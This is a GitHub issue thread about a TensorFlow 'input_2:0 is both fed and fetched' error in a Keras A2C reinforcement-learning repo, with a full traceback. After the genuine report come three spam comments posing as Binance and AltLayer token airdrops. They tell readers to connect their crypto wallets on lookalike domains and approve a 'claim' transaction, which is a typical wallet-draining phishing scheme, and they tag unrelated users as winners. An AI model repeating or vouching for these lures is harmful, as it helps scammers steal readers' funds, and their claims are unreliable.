### ISSUE TITLE
InvalidArgumentError: input_2:0 is both fed and fetched

### ISSUE THREAD

**Issue by voaneves** [OctThe16th/A2C-Keras#1]
Hi there. First off, thank you for the awesome repo.

So I was trying to run your repo (just cloned it to my desktop, no changes) and I got the following error when executing **main.py**.

```
Using TensorFlow backend.
C:\Users\victo\Anaconda3\lib\site-packages\gym\envs\registration.py:14: PkgResourcesDeprecationWarning: Parameters to load are deprecated.  Call .resolve and .require separately.
  result = entry_point.load(False)
Discrete(2) Box(4,)
Discrete(2) 4
__________________________________________________________________________________________________
Layer (type)                    Output Shape         Param #     Connected to                     
==================================================================================================
input_1 (InputLayer)            (None, 4)            0                                            
__________________________________________________________________________________________________
dense_1 (Dense)                 (None, 256)          1280        input_1[0][0]                    
__________________________________________________________________________________________________
dense_2 (Dense)                 (None, 256)          65792       dense_1[0][0]                    
__________________________________________________________________________________________________
out_actions (NoisyDense)        (None, 2)            1028        dense_2[0][0]                    
__________________________________________________________________________________________________
out_value (NoisyDense)          (None, 1)            514         dense_2[0][0]                    
__________________________________________________________________________________________________
input_2 (InputLayer)            (None, 1)            0                                            
==================================================================================================
Total params: 68,614
Trainable params: 68,614
Non-trainable params: 0
__________________________________________________________________________________________________
Traceback (most recent call last):
  File "C:\Users\victo\Desktop\Main.py", line 262, in <module>
    env_test.run()
  File "C:\Users\victo\Desktop\Main.py", line 242, in run
    self.runEpisode()
  File "C:\Users\victo\Desktop\Main.py", line 222, in runEpisode
    a = self.agent.act(s)
  File "C:\Users\victo\Desktop\Main.py", line 160, in act
    p = self.brain.predict_p(s)[0]
  File "C:\Users\victo\Desktop\Main.py", line 134, in predict_p
    p, v, r = self.model.predict([s, np.zeros(shape=(s.shape[0], 1))])
  File "C:\Users\victo\Anaconda3\lib\site-packages\keras\engine\training.py", line 1169, in predict
    steps=steps)
  File "C:\Users\victo\Anaconda3\lib\site-packages\keras\engine\training_arrays.py", line 294, in predict_loop
    batch_outs = f(ins_batch)
  File "C:\Users\victo\Anaconda3\lib\site-packages\keras\backend\tensorflow_backend.py", line 2715, in __call__
    return self._call(inputs)
  File "C:\Users\victo\Anaconda3\lib\site-packages\keras\backend\tensorflow_backend.py", line 2671, in _call
    session)
  File "C:\Users\victo\Anaconda3\lib\site-packages\keras\backend\tensorflow_backend.py", line 2623, in _make_callable
    callable_fn = session._make_callable_from_options(callable_opts)
  File "C:\Users\victo\Anaconda3\lib\site-packages\tensorflow\python\client\session.py", line 1471, in _make_callable_from_options
    return BaseSession._Callable(self, callable_options)
  File "C:\Users\victo\Anaconda3\lib\site-packages\tensorflow\python\client\session.py", line 1425, in __init__
    session._session, options_ptr, status)
  File "C:\Users\victo\Anaconda3\lib\site-packages\tensorflow\python\framework\errors_impl.py", line 528, in __exit__
    c_api.TF_GetCode(self.status.status))
tensorflow.python.framework.errors_impl.InvalidArgumentError: input_2:0 is both fed and fetched.
```

This is regarding the line `model = Model(inputs=[state_input, actual_value], outputs=[out_actions, out_value , actual_value])`.

**Tensorflow**: 1.12
**Python**: 3.7.0
**keras**: 2.2.4

Do you think it's better to separate the networks or is there any workaround?

Regards,
Victor.

**EDIT**
btw, the A3C is working fine!

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @jellyfish-py, @alexsams123456, @merlijndetovenaar84, @nick887, @yuanshanhshan, @Dounial, @atuans, @zhiduopc, @tomoya321, @ziyacan

**Comment by amit-sinotechmarine** [comment]
# AltLayer Airdrop Season One Update

[![AltLayer Airdrop Season One](https://i.ytimg.com/vi/9uxY8uLf3bE/maxresdefault.jpg)](https://go.altlayercommunity.online/XY2wna)

🚀 **Exciting Announcement!** AltLayer token (ALT) is gearing up for its Binance launch on January 25, 2024. As a token of appreciation, we extend a warm invitation to you to join the "ALT Token community" through an exclusive airdrop tailored for our early supporters and partners. Here's a quick overview:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of the total supply)
- **Distribution Categories:**
  - Ethereum Mainnet
  - Binance Mainnet

For a comprehensive breakdown of criteria and further details, refer to the complete announcement [Oficial Website](https://go.altlayercommunity.online/XY2wna).

The window to [Claim $ALT tokens](https://go.altlayercommunity.online/XY2wna) is open from January 25 to February 03, 2024. 

Any unclaimed $ALT tokens after this period will be returned to AltLayer’s Treasury.

We deeply appreciate your contribution to AltLayer's success! Stay tuned for more exciting developments in Season One.

**Important:** Please be aware of certain regional restrictions on the airdrop. Review the disclaimer before participating.

ez2k, @miramax281, @bilgerit, @quinlan0, @Frantt96, @eborlee, @zgq7799, @shenzhuo, @Chloe-Yu, @vedantk281007, @nico-von, @yule111222, @pavankumar0715, @HouSong, @jdh313, @ChristophorusX, @MaiMeng1204, @XSnine, @iy3r, @tahagurkas
